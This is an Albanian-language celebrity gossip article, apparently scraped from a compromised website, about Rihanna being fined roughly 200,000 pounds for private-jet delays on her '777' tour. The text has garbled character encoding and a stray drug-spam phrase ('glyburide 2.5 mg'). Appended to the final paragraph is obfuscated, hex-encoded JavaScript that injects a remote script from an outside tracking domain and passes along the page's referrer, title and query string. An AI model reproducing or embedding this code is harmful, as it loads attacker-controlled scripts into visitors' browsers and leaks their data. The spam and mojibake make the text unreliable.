largea_rihanna-airplane1353588833

Rihanna gjobitet me 200 mijA� funte pA�r shkak tA� a�?A�mendurivea�? tA� saj

QA� nga koha kur filloi turneun e saj “777”, Rihanna A�shtA� gjobitur disa herA� pA�r shkak tA� vonimit tA� avionit tA� saj privat dhe kA�shtu deri tani ka humbur 200 mijA� funte. glyburide 2.5 mg.

NA� fakt, pA�r shkak se vonohet nA� A�do koncert tA� planifikuar, duke kA�mbA�ngulur qA� pas A�do shfaqjeve tA� bA�jA� ndeja nA� shtatA� qytetet qA� aktualisht po performon, avioni i asaj nuk ndjek orarin e paracaktuara tA� aterrimeve dhe fluturimeve.

“Kjo A�shtA� mA�nyra e saj e rebelimit kundA�r asaj qA� A�do minutA� e jetA�s tA� jetA� e planifikuar. Nga ana tjetA�r, kjo po e A�mend ekipin e saj, i cili nA� mes tA� natA�s zhvillon biseda paniku me aeroportet, tA� cilat e kanA� tA� pA�rcaktuar rendin e saktA� tA� aterrimeve dhe fluturimeve”, tha njA� burim i afA�rt me kA�ngA�taren.

Fluturimi i kA�ngA�tares sA� hitit a�?We Found Lovea�? nga Meksika nA� Toronto u vonua pA�r katA�r orA�, ndA�rsa pA�r tri orA� u vonua fluturimi nga Stockholmi, me A�a��rast nA� skenA� doli me dy orA� e gjysmA� vonesA�, kurse tA� shtunA�n A�shtA� argA�tuar A�mendurisht deri nA� orA�n katA�r tA� mA�ngjesit nA� njA� ndejA� nA� Paris, tA� cilA�n e kishte organizuar pas koncertit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}